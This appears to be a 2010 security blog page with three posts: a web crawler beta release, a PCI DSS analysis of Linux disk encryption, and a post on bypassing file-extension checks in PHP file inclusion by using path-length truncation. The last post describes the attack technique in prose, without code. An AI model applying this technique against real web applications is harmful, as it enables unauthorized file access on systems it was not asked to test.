Friday, August 20, 2010

Web Crawler Beta Released!

Web Crawler - first public beta release is out!

Crawler is a utility designed for testing and demonstration of the WebEngine open source library features. This program gathers information about the resources of a specified web server by analyzing references in the HTML markup, text, and JavaScript code. Additionally, a query is sent to the Web Of Trust knowledge base to obtain information about the analyzed site. This check demonstrates analysis of web application vulnerabilities.
First and foremost, please do not be evil. Use crawler only against services you own, or have a permission to test. The given application is not a full-fledged analyzer of web application security.

Furthermore, the library is currently not meant for scanning of rogue and misbehaving HTTP servers; in these cases, correct and stable operation cannot be guaranteed.
The main features provided by the application are listed below:
  • JavaScript analysis aimed at receiving references with simulation of a DOM structure
  • Support of the Basic, Digest, and NTLM authorization schemes
  • Access to the contents of web servers via HTTP
  • Operation via proxy servers with various authorization schemes 
  • A wide variety of options to describe the scan target (lists of scanned domains, restriction of scanning to a host, a domain, or a web server directory, etc.)
  • Modular structure, which allows one to implement plug-ins

Web Crawler GUI - Scan Results Example

Web Crawler GUI - Profiles, Plugins

Friday, August 6, 2010

PCI DSS and Red Hat Enterprise Linux (Part #3)

Author: Feodor Kulishov

[Part #1] [Part #2]


Requirement 3: Protect stored cardholder data

3.4.1.а If disk encryption is used, logical access must be managed independently of native operating system access control mechanisms

The essence of the requirement is that access to decrypted data should be allowed only if the key is known; thereby, any processes and users (even system administrators) will not be able to read and modify such data correctly if they will not have the decryption key.

For all widespread mechanisms of encryption of the Linux file systems (cryptsetup, cryptsetup + LUKS, EncFS, eCryptFS), the decrypted file system (FS) is logically identical to the ordinary one and has the same access attributes, ACLs, etc. Thereby, the file system property of transparency is implemented. However, even if the data access rights are specified correctly, the root and the processes with UID=0 will be able to access any data after it will be decrypted by the key owner; is means that the given PCI DSS requirements are not fulfilled for all mechanisms of encryption of the Linux file systems.

Thursday, August 5, 2010

Another alternative for NULL byte

Undoubtedly, many of you remember that Raz0r brought up the question of alternative for NULL byte about a year ago and the ush group conducted corresponding investigations devoted to this problem [1, 2, and 3]. By the way, yours truly added a new method to the MaxPatrol knowledge base at the same time and supplemented the method implementation with own elaborations [4].

So, why do I touch this topic again? The deal is that the mentioned method was based on the idea to zap the file end (extension), which will in turn get into include. It is possible, because PHP uses path normalization and fails to access a file exceeding the MAX_PATH. Well, why can’t we use the same PHP restrictions (the MAX_PATH value) and try to fill the length of the file name from the beginning of the file? This idea occurred to a young man (Yuri Goltsev), who was asked a relevant question on the job interview. And it must work indeed!